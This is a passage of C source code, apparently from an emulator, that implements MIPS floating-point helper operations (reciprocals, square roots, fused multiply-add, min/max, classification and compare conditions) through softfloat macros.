float32_ ## name(fdt0 >> 32); \ return ((uint64_t)wth0 << 32) | wt0; \ } FLOAT_UNOP(abs) FLOAT_UNOP(chs) #undef FLOAT_UNOP /* MIPS specific unary operations */ uint64_t helper_float_recip_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_recip_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_rsqrt_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_rsqrt_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_recip1_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_recip1_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_recip1_ps(CPUMIPSState *env, uint64_t fdt0) { uint32_t fst2; uint32_t fsth2; fst2 = float32_div(float32_one, fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); fsth2 = float32_div(float32_one, fdt0 >> 32, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_rsqrt1_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_rsqrt1_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_rsqrt1_ps(CPUMIPSState *env, uint64_t fdt0) { uint32_t fst2; uint32_t fsth2; fst2 = float32_sqrt(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); fsth2 = float32_sqrt(fdt0 >> 32, &env->active_fpu.fp_status); fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); fsth2 = float32_div(float32_one, fsth2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } #define FLOAT_RINT(name, bits) \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t fs) \ { \ uint ## bits ## _t fdret; \ \ fdret = float ## bits ## _round_to_int(fs, &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return fdret; \ } FLOAT_RINT(rint_s, 32) FLOAT_RINT(rint_d, 64) #undef FLOAT_RINT #define FLOAT_CLASS_SIGNALING_NAN 0x001 #define FLOAT_CLASS_QUIET_NAN 0x002 #define FLOAT_CLASS_NEGATIVE_INFINITY 0x004 #define FLOAT_CLASS_NEGATIVE_NORMAL 0x008 #define FLOAT_CLASS_NEGATIVE_SUBNORMAL 0x010 #define FLOAT_CLASS_NEGATIVE_ZERO 0x020 #define FLOAT_CLASS_POSITIVE_INFINITY 0x040 #define FLOAT_CLASS_POSITIVE_NORMAL 0x080 #define FLOAT_CLASS_POSITIVE_SUBNORMAL 0x100 #define FLOAT_CLASS_POSITIVE_ZERO 0x200 #define FLOAT_CLASS(name, bits) \ uint ## bits ## _t float_ ## name(uint ## bits ## _t arg, \ float_status *status) \ { \ if (float ## bits ## _is_signaling_nan(arg, status)) { \ return FLOAT_CLASS_SIGNALING_NAN; \ } else if (float ## bits ## _is_quiet_nan(arg, status)) { \ return FLOAT_CLASS_QUIET_NAN; \ } else if (float ## bits ## _is_neg(arg)) { \ if (float ## bits ## _is_infinity(arg)) { \ return FLOAT_CLASS_NEGATIVE_INFINITY; \ } else if (float ## bits ## _is_zero(arg)) { \ return FLOAT_CLASS_NEGATIVE_ZERO; \ } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ return FLOAT_CLASS_NEGATIVE_SUBNORMAL; \ } else { \ return FLOAT_CLASS_NEGATIVE_NORMAL; \ } \ } else { \ if (float ## bits ## _is_infinity(arg)) { \ return FLOAT_CLASS_POSITIVE_INFINITY; \ } else if (float ## bits ## _is_zero(arg)) { \ return FLOAT_CLASS_POSITIVE_ZERO; \ } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ return FLOAT_CLASS_POSITIVE_SUBNORMAL; \ } else { \ return FLOAT_CLASS_POSITIVE_NORMAL; \ } \ } \ } \ \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t arg) \ { \ return float_ ## name(arg, &env->active_fpu.fp_status); \ } FLOAT_CLASS(class_s, 32) FLOAT_CLASS(class_d, 64) #undef FLOAT_CLASS /* binary operations */ #define FLOAT_BINOP(name) \ uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ uint64_t fdt0, uint64_t fdt1) \ { \ uint64_t dt2; \ \ dt2 = float64_ ## name(fdt0, fdt1, &env->active_fpu.fp_status);\ update_fcr31(env, GETPC()); \ return dt2; \ } \ \ uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ uint32_t fst0, uint32_t fst1) \ { \ uint32_t wt2; \ \ wt2 = float32_ ## name(fst0, fst1, &env->active_fpu.fp_status);\ update_fcr31(env, GETPC()); \ return wt2; \ } \ \ uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ uint64_t fdt0, \ uint64_t fdt1) \ { \ uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ uint32_t fsth0 = fdt0 >> 32; \ uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ uint32_t fsth1 = fdt1 >> 32; \ uint32_t wt2; \ uint32_t wth2; \ \ wt2 = float32_ ## name(fst0, fst1, &env->active_fpu.fp_status); \ wth2 = float32_ ## name(fsth0, fsth1, &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return ((uint64_t)wth2 << 32) | wt2; \ } FLOAT_BINOP(add) FLOAT_BINOP(sub) FLOAT_BINOP(mul) FLOAT_BINOP(div) #undef FLOAT_BINOP /* MIPS specific binary operations */ uint64_t helper_float_recip2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); fdt2 = float64_chs(float64_sub(fdt2, float64_one, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_recip2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) { fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_recip2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst2 = fdt2 & 0XFFFFFFFF; uint32_t fsth2 = fdt2 >> 32; fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); fsth2 = float32_chs(float32_sub(fsth2, float32_one, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_rsqrt2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); fdt2 = float64_sub(fdt2, float64_one, &env->active_fpu.fp_status); fdt2 = float64_chs(float64_div(fdt2, FLOAT_TWO64, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_rsqrt2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) { fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_rsqrt2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst2 = fdt2 & 0XFFFFFFFF; uint32_t fsth2 = fdt2 >> 32; fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); fsth2 = float32_sub(fsth2, float32_one, &env->active_fpu.fp_status); fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); fsth2 = float32_chs(float32_div(fsth2, FLOAT_TWO32, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_addr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst1 = fdt1 & 0XFFFFFFFF; uint32_t fsth1 = fdt1 >> 32; uint32_t fst2; uint32_t fsth2; fst2 = float32_add(fst0, fsth0, &env->active_fpu.fp_status); fsth2 = float32_add(fst1, fsth1, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_mulr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst1 = fdt1 & 0XFFFFFFFF; uint32_t fsth1 = fdt1 >> 32; uint32_t fst2; uint32_t fsth2; fst2 = float32_mul(fst0, fsth0, &env->active_fpu.fp_status); fsth2 = float32_mul(fst1, fsth1, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } #define FLOAT_MINMAX(name, bits, minmaxfunc) \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t fs, \ uint ## bits ## _t ft) \ { \ uint ## bits ## _t fdret; \ \ fdret = float ## bits ## _ ## minmaxfunc(fs, ft, \ &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return fdret; \ } FLOAT_MINMAX(max_s, 32, maxnum) FLOAT_MINMAX(max_d, 64, maxnum) FLOAT_MINMAX(maxa_s, 32, maxnummag) FLOAT_MINMAX(maxa_d, 64, maxnummag) FLOAT_MINMAX(min_s, 32, minnum) FLOAT_MINMAX(min_d, 64, minnum) FLOAT_MINMAX(mina_s, 32, minnummag) FLOAT_MINMAX(mina_d, 64, minnummag) #undef FLOAT_MINMAX /* ternary operations */ #define UNFUSED_FMA(prefix, a, b, c, flags) \ { \ a = prefix##_mul(a, b, &env->active_fpu.fp_status); \ if ((flags) & float_muladd_negate_c) { \ a = prefix##_sub(a, c, &env->active_fpu.fp_status); \ } else { \ a = prefix##_add(a, c, &env->active_fpu.fp_status); \ } \ if ((flags) & float_muladd_negate_result) { \ a = prefix##_chs(a); \ } \ } /* FMA based operations */ #define FLOAT_FMA(name, type) \ uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ uint64_t fdt0, uint64_t fdt1, \ uint64_t fdt2) \ { \ UNFUSED_FMA(float64, fdt0, fdt1, fdt2, type); \ update_fcr31(env, GETPC()); \ return fdt0; \ } \ \ uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ uint32_t fst0, uint32_t fst1, \ uint32_t fst2) \ { \ UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ update_fcr31(env, GETPC()); \ return fst0; \ } \ \ uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ uint64_t fdt0, uint64_t fdt1, \ uint64_t fdt2) \ { \ uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ uint32_t fsth0 = fdt0 >> 32; \ uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ uint32_t fsth1 = fdt1 >> 32; \ uint32_t fst2 = fdt2 & 0XFFFFFFFF; \ uint32_t fsth2 = fdt2 >> 32; \ \ UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ UNFUSED_FMA(float32, fsth0, fsth1, fsth2, type); \ update_fcr31(env, GETPC()); \ return ((uint64_t)fsth0 << 32) | fst0; \ } FLOAT_FMA(madd, 0) FLOAT_FMA(msub, float_muladd_negate_c) FLOAT_FMA(nmadd, float_muladd_negate_result) FLOAT_FMA(nmsub, float_muladd_negate_result | float_muladd_negate_c) #undef FLOAT_FMA #define FLOAT_FMADDSUB(name, bits, muladd_arg) \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t fs, \ uint ## bits ## _t ft, \ uint ## bits ## _t fd) \ { \ uint ## bits ## _t fdret; \ \ fdret = float ## bits ## _muladd(fs, ft, fd, muladd_arg, \ &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return fdret; \ } FLOAT_FMADDSUB(maddf_s, 32, 0) FLOAT_FMADDSUB(maddf_d, 64, 0) FLOAT_FMADDSUB(msubf_s, 32, float_muladd_negate_product) FLOAT_FMADDSUB(msubf_d, 64, float_muladd_negate_product) #undef FLOAT_FMADDSUB /* compare operations */ #define FOP_COND_D(op, cond) \ void helper_cmp_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ int c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } \ void helper_cmpabs_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ int c; \ fdt0 = float64_abs(fdt0); \ fdt1 = float64_abs(fdt1); \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered_quiet() is still called. */ FOP_COND_D(f, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_COND_D(un, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status)) FOP_COND_D(eq, float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ueq, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(olt, float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ult, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ole, float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ule, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered() is still called. */ FOP_COND_D(sf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_COND_D(ngle, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status)) FOP_COND_D(seq, float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ngl, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(lt, float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(nge, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(le, float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ngt, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) #define FOP_COND_S(op, cond) \ void helper_cmp_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ uint32_t fst1, int cc) \ { \ int c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } \ void helper_cmpabs_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ uint32_t fst1, int cc) \ { \ int c; \ fst0 = float32_abs(fst0); \ fst1 = float32_abs(fst1); \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered_quiet() is still called. */ FOP_COND_S(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_COND_S(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status)) FOP_COND_S(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered() is still called. */ FOP_COND_S(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_COND_S(ngle, float32_unordered(fst1, fst0, &env->active_fpu.fp_status)) FOP_COND_S(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(le, float32_le(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status)) #define FOP_COND_PS(op, condl, condh) \ void helper_cmp_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ uint32_t fst0, fsth0, fst1, fsth1; \ int ch, cl; \ fst0 = fdt0 & 0XFFFFFFFF; \ fsth0 = fdt0 >> 32; \ fst1 = fdt1 & 0XFFFFFFFF; \ fsth1 = fdt1 >> 32; \ cl = condl; \ ch = condh; \ update_fcr31(env, GETPC()); \ if (cl) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ if (ch) \ SET_FP_COND(cc + 1, env->active_fpu); \ else \ CLEAR_FP_COND(cc + 1, env->active_fpu); \ } \ void helper_cmpabs_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ uint32_t fst0, fsth0, fst1, fsth1; \ int ch, cl; \ fst0 = float32_abs(fdt0 & 0XFFFFFFFF); \ fsth0 = float32_abs(fdt0 >> 32); \ fst1 = float32_abs(fdt1 & 0XFFFFFFFF); \ fsth1 = float32_abs(fdt1 >> 32); \ cl = condl; \ ch = condh; \ update_fcr31(env, GETPC()); \ if (cl) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ if (ch) \ SET_FP_COND(cc + 1, env->active_fpu); \ else \ CLEAR_FP_COND(cc + 1, env->active_fpu); \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered_quiet() is still called. */ FOP_COND_PS(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0), (float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status), 0)) FOP_COND_PS(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status)) FOP_COND_PS(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered() is still called. */ FOP_COND_PS(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0), (float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status), 0)) FOP_COND_PS(ngle, float32_unordered(fst1, fst0, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status)) FOP_COND_PS(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status), float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status), float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(le, float32_le(fst0, fst1, &env->active_fpu.fp_status), float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) /* R6 compare operations */ #define FOP_CONDN_D(op, cond) \ uint64_t helper_r6_cmp_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1) \ { \ uint64_t c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) { \ return -1; \ } else { \ return 0; \ } \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered_quiet() is still called. */ FOP_CONDN_D(af, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_CONDN_D(un, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status))) FOP_CONDN_D(eq, (float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ueq, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(lt, (float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ult, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(le, (float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ule, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered() is still called.\ */ FOP_CONDN_D(saf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_CONDN_D(sun, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status))) FOP_CONDN_D(seq, (float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sueq, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(slt, (float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sult, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sle, (float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sule, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(or, (float64_le_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(une, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ne, (float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sor, (float64_le(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sune, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sne, (float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) #define FOP_CONDN_S(op, cond) \ uint32_t helper_r6_cmp_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ uint32_t fst1) \ { \ uint64_t c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) { \ return -1; \ } else { \ return 0; \ } \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered_quiet() is still called. */ FOP_CONDN_S(af, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_CONDN_S(un, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status))) FOP_CONDN_S(eq, (float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ueq, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(lt, (float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ult, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(le, (float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ule, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered() is still called. */ FOP_CONDN_S(saf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_CONDN_S(sun, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status))) FOP_CONDN_S(seq, (float32_eq(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sueq, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(slt, (float32_lt(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sult, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sle, (float32_le(fst0, fst1, 